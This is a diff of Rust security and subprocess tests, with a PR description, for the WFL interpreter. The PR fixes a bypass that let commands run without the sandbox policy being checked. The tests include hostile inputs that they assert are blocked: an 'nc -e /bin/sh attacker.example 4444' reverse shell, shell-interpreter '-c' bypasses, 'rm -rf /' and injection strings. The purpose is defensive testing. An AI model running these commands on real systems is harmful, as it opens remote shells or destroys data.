     let output = Command::new(wfl_exe)
-        .arg(temp_file.path())
+        .arg(env.path())
         .output()
         .expect("Failed to execute WFL");
 
@@ -45,33 +57,77 @@ fn run_wfl(code: &str) -> Result<String, String> {
     }
 }
 
+/// Platform-appropriate short-lived process spawn (echo).
+#[cfg(not(windows))]
+fn echo_spawn(label: &str, var: &str) -> String {
+    format!(
+        r#"spawn command "echo" with arguments ["{}"] as {}"#,
+        label, var
+    )
+}
+
+#[cfg(windows)]
+fn echo_spawn(label: &str, var: &str) -> String {
+    format!(
+        r#"spawn command "cmd.exe" with arguments ["/C", "echo {}"] as {}"#,
+        label, var
+    )
+}
+
+/// Platform-appropriate long-running process.
+#[cfg(not(windows))]
+fn sleep_spawn(secs: &str, var: &str) -> String {
+    format!(
+        r#"spawn command "sleep" with arguments ["{}"] as {}"#,
+        secs, var
+    )
+}
+
+#[cfg(windows)]
+fn sleep_spawn(secs: &str, var: &str) -> String {
+    // `timeout` is available on Windows runners; /nobreak avoids needing input.
+    format!(
+        r#"spawn command "timeout" with arguments ["/T", "{}", "/NOBREAK"] as {}"#,
+        secs, var
+    )
+}
+
 #[test]
 fn test_automatic_cleanup_of_completed_processes() {
     // This test verifies that completed processes are automatically cleaned up
     // when new processes are spawned
-    let code = r#"
+    let code = format!(
+        r#"
         // Spawn 5 quick processes that complete immediately
-        spawn command "echo" with arguments ["test1"] as proc1
-        spawn command "echo" with arguments ["test2"] as proc2
-        spawn command "echo" with arguments ["test3"] as proc3
-        spawn command "echo" with arguments ["test4"] as proc4
-        spawn command "echo" with arguments ["test5"] as proc5
+        {p1}
+        {p2}
+        {p3}
+        {p4}
+        {p5}
 
         // Wait for them to complete
         wait for 500 milliseconds
 
         // Spawn more processes - cleanup should happen automatically
-        spawn command "echo" with arguments ["test6"] as proc6
-        spawn command "echo" with arguments ["test7"] as proc7
+        {p6}
+        {p7}
 
         wait for 200 milliseconds
         wait for process proc6 to complete
         wait for process proc7 to complete
 
         display "Cleanup test completed"
-    "#;
+    "#,
+        p1 = echo_spawn("test1", "proc1"),
+        p2 = echo_spawn("test2", "proc2"),
+        p3 = echo_spawn("test3", "proc3"),
+        p4 = echo_spawn("test4", "proc4"),
+        p5 = echo_spawn("test5", "proc5"),
+        p6 = echo_spawn("test6", "proc6"),
+        p7 = echo_spawn("test7", "proc7"),
+    );
 
-    let result = run_wfl(code);
+    let result = run_wfl(&code);
     assert!(
         result.is_ok(),
         "Automatic cleanup should allow spawning new processes after old ones complete: {:?}",
@@ -83,19 +139,23 @@ fn test_automatic_cleanup_of_completed_processes() {
 fn test_process_limit_prevents_unbounded_growth() {
     // This test would fail without process limits if we tried to spawn 1000 processes
     // With limits, it should fail gracefully after hitting the limit
-    let code = r#"
+    let sleep_line = sleep_spawn("10", "proc");
+    let code = format!(
+        r#"
         // Try to spawn many long-running processes
         try:
             count from 1 to 150:
-                spawn command "sleep" with arguments ["10"] as proc
+                {sleep_line}
             end count
         when:
             display "Hit process limit as expected"
         end try
-    "#;
+    "#,
+        sleep_line = sleep_line
+    );
 
     // This should either complete (if limits allow 150) or fail with process limit error
-    let result = run_wfl(code);
+    let result = run_wfl(&code);
     // Either success or error mentioning process limit is acceptable
     if let Err(err) = result {
         assert!(
@@ -117,18 +177,22 @@ fn test_bounded_buffer_prevents_memory_explosion() {
         wait for read output from process spam_proc as output
         kill process spam_proc
         display length of output
-    "#;
+    "#
+    .to_string();
 
     #[cfg(windows)]
-    let code = r#"
-        spawn command "echo" with arguments ["test"] as proc
+    let code = format!(
+        r#"
+        {}
         wait for 200 milliseconds
         wait for read output from process proc as output
         wait for process proc to complete
         display output
-    "#;
+    "#,
+        echo_spawn("test", "proc")
+    );
 
-    let result = run_wfl(code);
+    let result = run_wfl(&code);
     assert!(
         result.is_ok(),
         "Bounded buffer test should complete without memory issues: {:?}",
@@ -148,20 +212,24 @@ fn test_bounded_buffer_prevents_memory_explosion() {
 #[test]
 fn test_killed_processes_dont_leak() {
     // Verify that killed processes are properly cleaned up
-    let code = r#"
-        spawn command "sleep" with arguments ["30"] as long_proc
+    let code = format!(
+        r#"
+        {}
         wait for 100 milliseconds
         kill process long_proc
 
         // Spawn another process - cleanup should have happened
-        spawn command "echo" with arguments ["after kill"] as proc
+        {}
         wait for 200 milliseconds
         wait for process proc to complete
 
         display "Kill cleanup test completed"
-    "#;
+    "#,
+        sleep_spawn("30", "long_proc"),
+        echo_spawn("after kill", "proc")
+    );
 
-    let result = run_wfl(code);
+    let result = run_wfl(&code);
     assert!(
         result.is_ok(),
         "Killed processes should be cleaned up properly: {:?}",
@@ -172,17 +240,20 @@ fn test_killed_processes_dont_leak() {
 #[test]
 fn test_wait_for_process_removes_handle() {
     // Verify that wait_for_process properly removes the handle from the HashMap
-    let code = r#"
-        spawn command "echo" with arguments ["test"] as proc1
+    let code = format!(
+        r#"
+        {}
         wait for 200 milliseconds
         wait for process proc1 to complete
 
         // Try to check if process is still running (it shouldn't be in the map)
         store still_running as process proc1 is running
         display still_running
-    "#;
+    "#,
+        echo_spawn("test", "proc1")
+    );
 
-    let result = run_wfl(code);
+    let result = run_wfl(&code);
     assert!(result.is_ok(), "wait_for_process should work: {:?}", result);
     let output = result.unwrap();
     // WFL displays booleans as "yes"/"no" - after wait_for_process removes the handle,
@@ -198,17 +269,20 @@ fn test_wait_for_process_removes_handle() {
 fn test_multiple_quick_spawns_dont_leak() {
     // Rapidly spawn and wait for many processes
     // This stresses the cleanup mechanism
-    let code = r#"
+    let code = format!(
+        r#"
         count from 1 to 20:
-            spawn command "echo" with arguments ["test"] as proc
+            {}
             wait for 100 milliseconds
             wait for process proc to complete
         end count
 
         display "Rapid spawn test completed"
-    "#;
+    "#,
+        echo_spawn("test", "proc")
+    );
 
-    let result = run_wfl(code);
+    let result = run_wfl(&code);
     assert!(
         result.is_ok(),
         "Rapid spawn and wait cycles should work without leaks: {:?}",
@@ -227,18 +301,22 @@ fn test_buffer_overflow_warning_non_fatal() {
         wait for read output from process proc as output
         kill process proc
         display "Buffer overflow handled gracefully"
-    "#;
+    "#
+    .to_string();
 
     #[cfg(windows)]
-    let code = r#"
-        spawn command "echo" with arguments ["test"] as proc
+    let code = format!(
+        r#"
+        {}
         wait for 200 milliseconds
         wait for read output from process proc as output
         wait for process proc to complete
         display "Test completed"
-    "#;
+    "#,
+        echo_spawn("test", "proc")
+    );
 
-    let result = run_wfl(code);
+    let result = run_wfl(&code);
     assert!(
         result.is_ok(),
         "Buffer overflow should be handled gracefully: {:?}",

--- a/tests/subprocess_security_test.rs
+++ b/tests/subprocess_security_test.rs
@@ -2,70 +2,130 @@ use std::fs;
 use std::process::Command;
 use std::thread;
 use std::time::Duration;
-use tempfile::NamedTempFile;
+use tempfile::TempDir;
 
-/// Robust temporary file cleanup wrapper
-struct TempWflFile {
-    _file: NamedTempFile,
-    path: String,
+/// Temp directory holding a `.wfl` program and optional `.wflcfg` so config walk-up works.
+struct TempWflEnv {
+    _dir: TempDir,
+    program_path: String,
 }
 
-impl TempWflFile {
-    fn new(code: &str) -> Result<Self, std::io::Error> {
-        let file = NamedTempFile::with_suffix(".wfl")?;
-        fs::write(file.path(), code)?;
-        let path = file.path().to_string_lossy().to_string();
-        Ok(TempWflFile { _file: file, path })
+impl TempWflEnv {
+    fn new(code: &str, config: Option<&str>) -> Result<Self, std::io::Error> {
+        let dir = TempDir::new()?;
+        if let Some(cfg) = config {
+            fs::write(dir.path().join(".wflcfg"), cfg)?;
+        }
+        let program_path = dir.path().join("test_program.wfl");
+        fs::write(&program_path, code)?;
+        Ok(TempWflEnv {
+            _dir: dir,
+            program_path: program_path.to_string_lossy().to_string(),
+        })
     }
 
     fn path(&self) -> &str {
-        &self.path
+        &self.program_path
+    }
+}
+
+const PERMISSIVE_CONFIG: &str = r#"
+allow_shell_execution = true
+shell_execution_mode = sanitized
+warn_on_shell_execution = false
+"#;
+
+#[cfg(not(windows))]
+const ALLOWLIST_PROGRAM_CONFIG: &str = r#"
+allow_shell_execution = true
+shell_execution_mode = allowlist_only
+allowed_shell_commands = echo
+warn_on_shell_execution = false
+"#;
+
+// Windows has no standalone echo.exe; allowlist cmd.exe for opt-in tests.
+#[cfg(windows)]
+const ALLOWLIST_PROGRAM_CONFIG: &str = r#"
+allow_shell_execution = true
+shell_execution_mode = allowlist_only
+allowed_shell_commands = cmd.exe
+warn_on_shell_execution = false
+"#;
+
+fn wfl_exe() -> &'static str {
+    if cfg!(target_os = "windows") {
+        "target/release/wfl.exe"
+    } else {
+        "target/release/wfl"
     }
 }
 
 fn run_wfl(code: &str) -> Result<String, String> {
-    let temp_file = TempWflFile::new(code).expect("Failed to create temp file");
+    run_wfl_with_config(code, None)
+}
 
-    let wfl_exe = if cfg!(target_os = "windows") {
-        "target/release/wfl.exe"
-    } else {
-        "target/release/wfl"
-    };
+fn run_wfl_with_config(code: &str, config: Option<&str>) -> Result<String, String> {
+    let env = TempWflEnv::new(code, config).expect("Failed to create temp WFL env");
 
-    let output = Command::new(wfl_exe)
-        .arg(temp_file.path())
+    let output = Command::new(wfl_exe())
+        .arg(env.path())
         .output()
         .expect("Failed to execute WFL");
 
     let stdout = String::from_utf8_lossy(&output.stdout).to_string();
     let stderr = String::from_utf8_lossy(&output.stderr).to_string();
+    let combined = format!("{}{}", stdout, stderr);
 
-    if !stderr.is_empty() && stderr.contains("error") || stderr.contains("Error") {
+    // Policy denials and runtime errors are reported on stderr (and may also
+    // appear in the combined stream). Treat non-success exit or error text as Err.
+    let looks_like_error = !output.status.success()
+        || combined.contains("blocked by security policy")
+        || combined.contains("Command blocked")
+        || (combined.contains("error") || combined.contains("Error"));
+
+    if looks_like_error
+        && (combined.contains("blocked")
+            || combined.contains("security policy")
+            || combined.contains("disabled")
+            || !output.status.success())
+    {
+        // Prefer classifying security blocks as Err even if exit is non-zero
+        if combined.contains("blocked")
+            || combined.contains("security policy")
+            || combined.contains("allow_shell_execution")
+            || combined.contains("disabled")
+        {
+            return Err(combined);
+        }
+        if !output.status.success() {
+            return Err(combined);
+        }
+    }
+
+    if !stderr.is_empty() && (stderr.contains("error") || stderr.contains("Error")) {
         Err(stderr)
     } else {
-        Ok(format!("{}{}", stdout, stderr))
+        Ok(combined)
     }
 }
 
 /// Run WFL with retry logic that validates output contains expected strings
-/// This is more robust for timing-sensitive tests that might succeed but produce empty output
 fn run_wfl_with_validation(
     code: &str,
+    config: Option<&str>,
     max_attempts: usize,
     expected_strings: &[&str],
 ) -> Result<String, String> {
     let mut last_result = Err("Not attempted".to_string());
 
     for attempt in 1..=max_attempts {
-        match run_wfl(code) {
+        match run_wfl_with_config(code, config) {
             Ok(output) => {
-                // Check if output contains all expected strings
                 let all_present = expected_strings.iter().all(|s| output.contains(s));
 
                 if all_present {
                     return Ok(output);
                 } else {
-                    // Output succeeded but doesn't have expected content - might be timing issue
                     let missing: Vec<&str> = expected_strings
                         .iter()
                         .filter(|s| !output.contains(*s))
@@ -76,7 +136,6 @@ fn run_wfl_with_validation(
                         attempt, max_attempts, missing, output
                     ));
                     if attempt < max_attempts {
-                        // Wait before retrying with exponential backoff
                         thread::sleep(Duration::from_millis(
                             150 * 2u64.saturating_pow((attempt - 1) as u32),
                         ));
@@ -86,7 +145,6 @@ fn run_wfl_with_validation(
             Err(e) => {
                 last_result = Err(e);
                 if attempt < max_attempts {
-                    // Wait before retrying with exponential backoff
                     thread::sleep(Duration::from_millis(
                         150 * 2u64.saturating_pow((attempt - 1) as u32),
                     ));
@@ -95,8 +153,32 @@ fn run_wfl_with_validation(
         }
     }
 
-    // Return the last result even if validation failed
     last_result
+}
+
+fn assert_blocked(result: Result<String, String>, context: &str) {
+    assert!(
+        result.is_err(),
+        "{} should be blocked by default security policy, got: {:?}",
+        context,
+        result
+    );
+    let err = result.unwrap_err();
+    assert!(
+        err.contains("security policy")
+            || err.contains("blocked")
+            || err.contains("disabled")
+            || err.contains("allow_shell_execution"),
+        "{}: error should mention security policy: {}",
+        context,
+        err
+    );
+    assert!(
+        !err.contains("pwned") || err.contains("blocked"),
+        "{}: payload must not execute successfully: {}",
+        context,
+        err
+    );
 }
 
 #[test]
@@ -105,32 +187,113 @@ fn test_shell_injection_blocked_by_default() {
         execute command "echo test; echo injected" as result
     "#;
 
-    let result = run_wfl(code);
-    assert!(
-        result.is_err(),
-        "Command with semicolon should be blocked by default security policy"
-    );
-    let err = result.unwrap_err();
-    assert!(
-        err.contains("security policy") || err.contains("blocked"),
-        "Error should mention security policy: {}",
-        err
-    );
+    assert_blocked(run_wfl(code), "Command with semicolon");
 }
 
 #[test]
-fn test_safe_argument_execution() {
+fn test_direct_exec_shell_with_args_blocked_by_default() {
+    // Finding 1 bypass: non-empty args skipped the sanitizer under Forbidden.
+    #[cfg(not(windows))]
+    let code = r#"
+        execute command "sh" with arguments ["-c", "echo pwned"] as result
+        display result
+    "#;
+
+    #[cfg(windows)]
+    let code = r#"
+        execute command "cmd.exe" with arguments ["/C", "echo pwned"] as result
+        display result
+    "#;
+
+    let result = run_wfl(code);
+    assert_blocked(result.clone(), "Shell interpreter with -c /C args");
+    if let Err(err) = result {
+        assert!(
+            !err.lines().any(|l| l.trim() == "pwned"),
+            "Payload must not print: {}",
+            err
+        );
+    }
+}
+
+#[test]
+fn test_plain_binary_without_metacharacters_blocked_by_default() {
+    // Finding 1 bypass: no metacharacters + empty args skipped the sanitizer.
+    let code = r#"
+        execute command "nc -e /bin/sh attacker.example 4444" as result
+    "#;
+
+    assert_blocked(run_wfl(code), "Plain reverse-shell style command");
+}
+
+#[test]
+fn test_safe_argument_execution_blocked_by_default() {
+    // Secure defaults deny all process execution, including "safe" argv form.
     let code = r#"
         wait for execute command "echo" with arguments ["hello", "world"] as result
         display result
     "#;
 
-    let result = run_wfl(code);
-    assert!(result.is_ok(), "Safe argument-based execution should work");
+    assert_blocked(run_wfl(code), "Direct-exec under default config");
+}
+
+#[test]
+fn test_safe_argument_execution_with_opt_in_config() {
+    #[cfg(not(windows))]
+    let code = r#"
+        wait for execute command "echo" with arguments ["hello", "world"] as result
+        display result
+    "#;
+    #[cfg(windows)]
+    let code = r#"
+        wait for execute command "cmd.exe" with arguments ["/C", "echo hello world"] as result
+        display result
+    "#;
+
+    let result = run_wfl_with_config(code, Some(PERMISSIVE_CONFIG));
     assert!(
-        result.unwrap().contains("hello"),
+        result.is_ok(),
+        "Opt-in sanitized config should allow direct-exec: {:?}",
+        result
+    );
+    assert!(
+        result.unwrap().to_lowercase().contains("hello"),
         "Output should contain expected text"
     );
+}
+
+#[test]
+fn test_allowlist_only_blocks_non_listed_program() {
+    let code = r#"
+        wait for execute command "rm" with arguments ["-rf", "/"] as result
+    "#;
+
+    assert_blocked(
+        run_wfl_with_config(code, Some(ALLOWLIST_PROGRAM_CONFIG)),
+        "Non-allowlisted program",
+    );
+}
+
+#[test]
+fn test_allowlist_only_allows_listed_program() {
+    #[cfg(not(windows))]
+    let code = r#"
+        wait for execute command "echo" with arguments ["allowlisted"] as result
+        display result
+    "#;
+    #[cfg(windows)]
+    let code = r#"
+        wait for execute command "cmd.exe" with arguments ["/C", "echo allowlisted"] as result
+        display result
+    "#;
+
+    let result = run_wfl_with_config(code, Some(ALLOWLIST_PROGRAM_CONFIG));
+    assert!(
+        result.is_ok(),
+        "Allowlisted program should run: {:?}",
+        result
+    );
+    assert!(result.unwrap().contains("allowlisted"));
 }
 
 #[test]
@@ -139,11 +302,7 @@ fn test_pipe_blocked_by_default() {
         execute command "echo test | grep test" as result
     "#;
 
-    let result = run_wfl(code);
-    assert!(
-        result.is_err(),
-        "Command with pipe should be blocked by default"
-    );
+    assert_blocked(run_wfl(code), "Command with pipe");
 }
 
 #[test]
@@ -158,21 +317,7 @@ fn test_command_substitution_blocked() {
         execute command "echo test" as result
     "#;
 
-    #[cfg(not(windows))]
-    {
-        let result = run_wfl(code);
-        assert!(
-            result.is_err(),
-            "Command substitution should be blocked by default"
-        );
-    }
-
-    #[cfg(windows)]
-    {
-        // On Windows, just verify safe commands work
-        let result = run_wfl(code);
-        assert!(result.is_ok(), "Simple safe command should work on Windows");
-    }
+    assert_blocked(run_wfl(code), "Command substitution / default exec");
 }
 
 #[test]
@@ -187,20 +332,7 @@ fn test_background_execution_blocked() {
         execute command "echo test" as result
     "#;
 
-    #[cfg(not(windows))]
-    {
-        let result = run_wfl(code);
-        assert!(
-            result.is_err(),
-            "Background execution should be blocked by default"
-        );
-    }
-
-    #[cfg(windows)]
-    {
-        let result = run_wfl(code);
-        assert!(result.is_ok(), "Safe command should work");
-    }
+    assert_blocked(run_wfl(code), "Background execution / default exec");
 }
 
 #[test]
@@ -209,16 +341,11 @@ fn test_redirection_blocked() {
         execute command "echo test > output.txt" as result
     "#;
 
-    let result = run_wfl(code);
-    assert!(
-        result.is_err(),
-        "Command with redirection should be blocked by default"
-    );
+    assert_blocked(run_wfl(code), "Command with redirection");
 }
 
 #[test]
-fn test_simple_command_without_args_works() {
-    // Simple commands without shell features should work
+fn test_simple_command_without_args_blocked_by_default() {
     #[cfg(not(windows))]
     let code = r#"
         wait for execute command "pwd" as result
@@ -231,16 +358,43 @@ fn test_simple_command_without_args_works() {
         display result
     "#;
 
-    let result = run_wfl(code);
+    assert_blocked(run_wfl(code), "Simple command under default");
+}
+
+#[test]
+fn test_simple_command_with_opt_in_config() {
+    #[cfg(not(windows))]
+    let code = r#"
+        wait for execute command "pwd" as result
+        display result
+    "#;
+
+    #[cfg(windows)]
+    let code = r#"
+        wait for execute command "hostname" as result
+        display result
+    "#;
+
+    let result = run_wfl_with_config(code, Some(PERMISSIVE_CONFIG));
     assert!(
         result.is_ok(),
-        "Simple command without shell features should work: {:?}",
+        "Simple command under sanitized config should work: {:?}",
         result
     );
 }
 
 #[test]
-fn test_spawn_with_safe_arguments() {
+fn test_spawn_with_safe_arguments_blocked_by_default() {
+    let code = r#"
+        spawn command "echo" with arguments ["test"] as proc_id
+    "#;
+
+    assert_blocked(run_wfl(code), "Spawn under default config");
+}
+
+#[test]
+fn test_spawn_with_safe_arguments_opt_in() {
+    #[cfg(not(windows))]
     let code = r#"
         spawn command "echo" with arguments ["test"] as proc_id
         wait for 250 milliseconds
@@ -248,12 +402,19 @@ fn test_spawn_with_safe_arguments() {
         wait for process proc_id to complete
         display proc_output
     "#;
+    #[cfg(windows)]
+    let code = r#"
+        spawn command "cmd.exe" with arguments ["/C", "echo test"] as proc_id
+        wait for 250 milliseconds
+        wait for read output from process proc_id as proc_output
+        wait for process proc_id to complete
+        display proc_output
+    "#;
 
-    // Use validation-based retry logic to handle timing issues on loaded systems
-    let result = run_wfl_with_validation(code, 5, &["test"]);
+    let result = run_wfl_with_validation(code, Some(PERMISSIVE_CONFIG), 5, &["test"]);
     assert!(
         result.is_ok(),
-        "Spawn with safe arguments should work: {:?}",
+        "Spawn with safe arguments under opt-in should work: {:?}",
         result
     );
 
@@ -263,6 +424,21 @@ fn test_spawn_with_safe_arguments() {
         "Output should contain expected text 'test'. Actual output: '{}'",
         output
     );
+}
+
+#[test]
+fn test_spawn_shell_interpreter_args_blocked_by_default() {
+    #[cfg(not(windows))]
+    let code = r#"
+        spawn command "sh" with arguments ["-c", "echo pwned"] as proc_id
+    "#;
+
+    #[cfg(windows)]
+    let code = r#"
+        spawn command "cmd.exe" with arguments ["/C", "echo pwned"] as proc_id
+    "#;
+
+    assert_blocked(run_wfl(code), "Spawn shell interpreter with args");
 }
 
 #[test]
@@ -277,27 +453,12 @@ fn test_spawn_shell_blocked_by_default() {
         spawn command "echo test" as proc_id
     "#;
 
-    #[cfg(not(windows))]
-    {
-        let result = run_wfl(code);
-        assert!(
-            result.is_err(),
-            "Spawn with shell features should be blocked by default"
-        );
-    }
-
-    #[cfg(windows)]
-    {
-        // Windows: just verify safe commands work
-        let result = run_wfl(code);
-        if result.is_err() {
-            println!("Note: On Windows, even simple spawns may fail without proper wait");
-        }
-    }
+    assert_blocked(run_wfl(code), "Spawn with shell features / default");
 }
 
 #[test]
-fn test_multiple_safe_processes() {
+fn test_multiple_safe_processes_opt_in() {
+    #[cfg(not(windows))]
     let code = r#"
         spawn command "echo" with arguments ["test1"] as proc1
         spawn command "echo" with arguments ["test2"] as proc2
@@ -309,12 +470,23 @@ fn test_multiple_safe_processes() {
         display out1
         display out2
     "#;
+    #[cfg(windows)]
+    let code = r#"
+        spawn command "cmd.exe" with arguments ["/C", "echo test1"] as proc1
+        spawn command "cmd.exe" with arguments ["/C", "echo test2"] as proc2
+        wait for 250 milliseconds
+        wait for read output from process proc1 as out1
+        wait for read output from process proc2 as out2
+        wait for process proc1 to complete
+        wait for process proc2 to complete
+        display out1
+        display out2
+    "#;
 
-    // Use validation-based retry logic to handle timing issues on loaded systems
-    let result = run_wfl_with_validation(code, 5, &["test1", "test2"]);
+    let result = run_wfl_with_validation(code, Some(PERMISSIVE_CONFIG), 5, &["test1", "test2"]);
     assert!(
         result.is_ok(),
-        "Multiple safe processes should work: {:?}",
+        "Multiple safe processes under opt-in should work: {:?}",
         result
     );
 

--- a/tests/subprocess_test.rs
+++ b/tests/subprocess_test.rs
@@ -1,6 +1,8 @@
 // Integration tests for subprocess support in WFL
 // Tests execute, spawn, process control, and output streaming
 
+use std::sync::Arc;
+use wfl::config::{ShellExecutionMode, WflConfig};
 use wfl::interpreter::Interpreter;
 use wfl::interpreter::value::Value;
 use wfl::lexer::lex_wfl_with_positions;
@@ -10,7 +12,17 @@ use wfl::parser::Parser;
 mod subprocess_tests {
     use super::*;
 
-    /// Test helper to run WFL code
+    /// Opt-in config: secure defaults deny all process execution.
+    fn permissive_config() -> Arc<WflConfig> {
+        Arc::new(WflConfig {
+            allow_shell_execution: true,
+            shell_execution_mode: ShellExecutionMode::Sanitized,
+            warn_on_shell_execution: false,
+            ..Default::default()
+        })
+    }
+
+    /// Test helper to run WFL code under opt-in subprocess policy
     async fn run_wfl_code(code: &str) -> Result<(), String> {
         let tokens = lex_wfl_with_positions(code);
         let mut parser = Parser::new(&tokens);
@@ -18,7 +30,7 @@ mod subprocess_tests {
             .parse()
             .map_err(|e| format!("Parse error: {:?}", e))?;
 
-        let mut interpreter = Interpreter::new();
+        let mut interpreter = Interpreter::with_config(permissive_config());
         interpreter
             .interpret(&ast)
             .await
@@ -35,7 +47,7 @@ mod subprocess_tests {
             .parse()
             .map_err(|e| format!("Parse error: {:?}", e))?;
 
-        let mut interpreter = Interpreter::new();
+        let mut interpreter = Interpreter::with_config(permissive_config());
         interpreter
             .interpret(&ast)
             .await
@@ -49,9 +61,31 @@ mod subprocess_tests {
     }
 
     #[tokio::test]
+    async fn test_default_config_denies_subprocess() {
+        let tokens = lex_wfl_with_positions(
+            r#"wait for execute command "echo" with arguments ["hi"] as result"#,
+        );
+        let mut parser = Parser::new(&tokens);
+        let ast = parser.parse().expect("parse");
+        let mut interpreter = Interpreter::new(); // secure defaults
+        let result = interpreter.interpret(&ast).await;
+        assert!(
+            result.is_err(),
+            "Default interpreter must deny subprocess: {:?}",
+            result
+        );
+    }
+
+    #[tokio::test]
     async fn test_execute_simple_command() {
+        #[cfg(not(windows))]
         let code = r#"
-            wait for execute command "echo Hello World" as result
+            wait for execute command "echo" with arguments ["Hello", "World"] as result
+            display "Command executed"
+        "#;
+        #[cfg(windows)]
+        let code = r#"
+            wait for execute command "cmd.exe" with arguments ["/C", "echo Hello World"] as result
             display "Command executed"
         "#;
 
@@ -65,8 +99,13 @@ mod subprocess_tests {
 
     #[tokio::test]
     async fn test_execute_command_stores_result() {
+        #[cfg(not(windows))]
         let code = r#"
-            wait for execute command "echo test" as result
+            wait for execute command "echo" with arguments ["test"] as result
+        "#;
+        #[cfg(windows)]
+        let code = r#"
+            wait for execute command "cmd.exe" with arguments ["/C", "echo test"] as result
         "#;
 
         let result = run_wfl_code_and_get_var(code, "result").await;
@@ -82,8 +121,14 @@ mod subprocess_tests {
 
     #[tokio::test]
     async fn test_execute_command_completes() {
+        #[cfg(not(windows))]
         let code = r#"
-            wait for execute command "echo test" as result
+            wait for execute command "echo" with arguments ["test"] as result
+            display "Execution completed"
+        "#;
+        #[cfg(windows)]
+        let code = r#"
+            wait for execute command "cmd.exe" with arguments ["/C", "echo test"] as result
             display "Execution completed"
         "#;
 
@@ -178,8 +223,16 @@ mod subprocess_tests {
 
     #[tokio::test]
     async fn test_read_process_output() {
+        #[cfg(not(windows))]
         let code = r#"
-            wait for spawn command "echo test data" as proc
+            wait for spawn command "echo" with arguments ["test", "data"] as proc
+            wait for 200 milliseconds
+            wait for read output from process proc as proc_output
+            display proc_output
+        "#;
+        #[cfg(windows)]
+        let code = r#"
+            wait for spawn command "cmd.exe" with arguments ["/C", "echo test data"] as proc
             wait for 200 milliseconds
             wait for read output from process proc as proc_output
             display proc_output
@@ -235,16 +288,22 @@ mod subprocess_tests {
 
     #[tokio::test]
     async fn test_execute_with_shell() {
-        // Test that shell commands work correctly
+        // Platform-native argv form under opt-in policy
+        #[cfg(not(windows))]
         let code = r#"
-            wait for execute command "echo test args" as result
+            wait for execute command "echo" with arguments ["test", "args"] as result
+            display "Command with shell executed"
+        "#;
+        #[cfg(windows)]
+        let code = r#"
+            wait for execute command "cmd.exe" with arguments ["/C", "echo test args"] as result
             display "Command with shell executed"
         "#;
 
         let result = run_wfl_code(code).await;
         assert!(
             result.is_ok(),
-            "Execute with shell should work: {:?}",
+            "Execute with argv should work: {:?}",
             result
         );
     }
@@ -252,8 +311,14 @@ mod subprocess_tests {
     #[tokio::test]
     async fn test_execute_without_variable() {
         // Test executing without storing result
+        #[cfg(not(windows))]
         let code = r#"
-            wait for execute command "echo test"
+            wait for execute command "echo" with arguments ["test"]
+            display "Done"
+        "#;
+        #[cfg(windows)]
+        let code = r#"
+            wait for execute command "cmd.exe" with arguments ["/C", "echo test"]
             display "Done"
         "#;
 


### PR DESCRIPTION
## Summary

Closes a critical subprocess sandbox bypass present in shipped WFL: security policy (`shell_execution_mode`, and the dead `allow_shell_execution` flag) was only consulted when `needs_shell` was true. Direct-exec paths skipped policy entirely, so under default `Forbidden` these worked:

- `execute command "sh" with arguments ["-c", "..."]` (and Windows `cmd.exe /C`)
- Plain binaries with no shell metacharacters (e.g. reverse-shell style command strings)

### Fix

| Layer | Default | Behavior |
|---|---|---|
| `allow_shell_execution` | `false` | Master switch: when false, **all** process launches are blocked |
| `shell_execution_mode` | `forbidden` | When master is on: forbidden = deny all; allowlist_only = basename must be listed; sanitized/unrestricted = allow (warn on shell path) |

- New `CommandSanitizer::authorize_process_execution` is the single gate
- Both `execute_command` and `spawn_process` call it **before** any `Command::new`
- Error messages point at `.wflcfg` opt-in (no longer suggest ungated `with arguments` as a Forbidden escape hatch)
- Docs, README, CHANGELOG, Dev Diary updated; `TestPrograms/.wflcfg` opts in for intentional demos only

### Migration (intentional secure-default change)

```ini
allow_shell_execution = true
shell_execution_mode = sanitized
# or allowlist_only + allowed_shell_commands = ...
```

## Test plan

- [x] Unit: `command_sanitizer` (26 tests) — default deny, master switch, allowlist, basename
- [x] Unit: `process_tests` — default blocks direct-exec and shell-with-args; opt-in runs
- [x] `cargo test --test subprocess_test`
- [x] Release binary + `cargo test --test subprocess_security_test` (18 tests) including Finding 1 bypass cases
- [x] `cargo fmt` / `cargo clippy --all-targets --all-features -- -D warnings`

## Handling notes

- Private security fix PR only — **do not** open public issues for the bypass / false sandbox claim
- Optional follow-up: GitHub Security Advisory after merge/deploy (wfl.fyi should pick up the fixed binary)
- Out of scope: main-loop timeout capability, release recursion cap, sqlx driver gating
